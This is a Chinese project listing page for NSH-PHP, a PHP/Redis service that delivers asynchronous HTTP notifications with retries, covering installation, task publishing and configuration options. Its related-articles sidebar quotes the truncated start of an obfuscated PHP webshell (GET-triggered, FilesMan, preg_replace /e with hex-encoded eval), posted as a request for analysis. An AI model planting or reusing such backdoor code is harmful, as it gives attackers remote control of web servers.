基于 HTTP 的高送达率异步通知服务 NSH-PHP

未知
PHP
跨平台
2019-08-16
喜欢吃红薯

NSH-PHP(Notification service based on HTTP)是一个基于 HTTP 的高送达率异步通知服务。

使用场景

  • 支付成功通知服务
  • 多业务之间的高送达率类异步通知服务
  • ...

比如A要将某个消息通知到B,但是又不想在通知的过程中对A的业务执行造成阻塞,那么就可以将通知任务打包给专门的通知服务处理中心,由该中心执行消息通知服务

安装

  1. 下载程序
  2. composer install完成依赖安装

启动服务

  1. 打开config.php配置redis以及通知策略
  2. 执行php worker.php启动通知服务

发布任务

内置了一个通过http post的方式提交任务的进程,只需要执行 php http_api.php 即可通过post的方式发布通知任务,另外您也可以根据自身情况通过其他方式发布任务,例如直接写redis

注意,每发布一个任务,最好规定一个唯一标识,参考http_api.php里面的uuid参数,方便做任务追踪分析。也可以加入其它筛选条目方便做数据筛选分析。能很方便的实现统计分析来自不同客户的的任务处理情况

curl post http://127.0.0.1:2345

url:http://xxx.com/path/to?foo=bar  通知地址
payload:somestring... 通知内容
tactic:A 通知策略
time:15968576857 初次发起通知的时间 不填则默认当前时间

配置项说明

  • fail_interval:通知失败后再次发起通知的间隔秒数
  • max_times:最大通知次数,失败次数到达此次数则认为目标失活,会丢弃该条目的通知服务
  • notify_rates:通知频率,数组第一个表示当前时间点的通知频率,第二个表示当前时间点上一秒的通知频率,以此类推,通常当前时间点就能把任务通知完毕,若任务较多,在当前时间的任务未全部执行,剩下的任务会跌落到上一个时间点,一般3-5个时间点比较合理
  • clear_rate:若上面的所有时间点都没有将任务执行完毕,还有一个兜底的进程,做清理工作,此处就是兜底进程的执行频率
  • clear_start:兜底进程的清理时间点,通常是当前时间的前面10分钟基本能满足需求,视具体情况而定,比如系统停止了一个小时,那么兜底时间最好填写系统停止时间之前

上面的配置项通常需要结合服务器自身硬件配置和带宽大小等等,若一个服务器无法完成通知服务,可以多开几个服务器运行此服务

运维监控

系统默认是将通知日志记录在日志文件里面,您可以通过简单的配置(见common.php里面的logger方法,monolog)将日志记录到elastic,redis,mysql...等数十个平台进行运维监控

的码云指数为
超过 的项目
加载中

评论(0)

暂无评论

暂无资讯

暂无问答

NSIS脚本学习:创建 MUI 界面使用的自定义语言包文件(nlf & nsh)

NSIS脚本学习:创建 MUI 界面使用的自定义语言包文件(nlf & nsh)

2016/04/06 23:39
918
1
Open Hardware and Software : TMR-FC V1.0

My TMR-FC Flight Controller - Frame - Controller - Introductions 1. User Guide : TMR_FC_UM_V1_120730.pdf 2. Sechematic : TMR_FC_HW_V1_120830.pdf 3. Gerber : TMRFC_GB_V1_120930.r...

2013/09/09 18:44
382
1
浅析OpendayLight SFC

1.Ubuntu环境搭建 Demo环境使用ubuntu14.04系统,本文所使用的是:ubuntu-14.04.1-desktop-amd64,该系统内核为3.13.0,使用其他版本亦可,但请确保内核版本不高于3.14。下载VMware Workstat...

2016/08/17 18:15
107
0
Swift 中的 Runtime

即使在 Swift APP 中没有一行 Object-c 的代码,每个 APP 也都会在 Object-c runtime 中运行,为动态任务分发和运行时对象关联开启了一个世界。更确切地说,可能在仅使用 Swift 库的时候只运...

2015/12/18 13:39
48
0
NSIS脚本学习:使用 LogicLib.nsh 实现基本流程控制结构

NSIS脚本学习:使用 LogicLib.nsh 实现基本流程控制结构

2016/04/09 16:26
719
1
实现springcloud日志流水追踪

实现思路: 通过向log4j中增加唯一ID,并将此ID在不同模块中传递下去,实现流水追踪的功能。 关键技术: 1、log4j : 使用MDC封装唯一ID到当前线程中,并在log4j的配置文件里输出MDC的key,这...

04/04 16:38
1
0
尼玛尼玛尼玛。大神来分析下?大马小马你妹的马

<?php if(isset($_GET["t2821n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x6...

2012/12/01 14:28
425
0
Linux 系统与数据库安全

Linux 系统与数据库安全 Mr. Neo Chen (netkiller), 陈景峰(BG7NYT) 中国广东省深圳市龙华新区民治街道溪山美地 518131 +86 13113668890 +86 755 29812080 <netkiller@msn.com> 版权 © 2011...

2013/07/24 22:58
201
1
基于SDN,NFV的服务感知网络架构下篇

编者按:本篇文章是继《基于SDN,NFV的服务感知网络架构上篇》对DPI进行进一步的深入解析,分析了在SDN中可能出现的三种部署情况,对第4-7层的业务需求以及业务感知网络架构作了一个深入的介绍...

2015/01/14 13:45
43
0

没有更多内容

加载失败,请刷新页面

返回顶部
顶部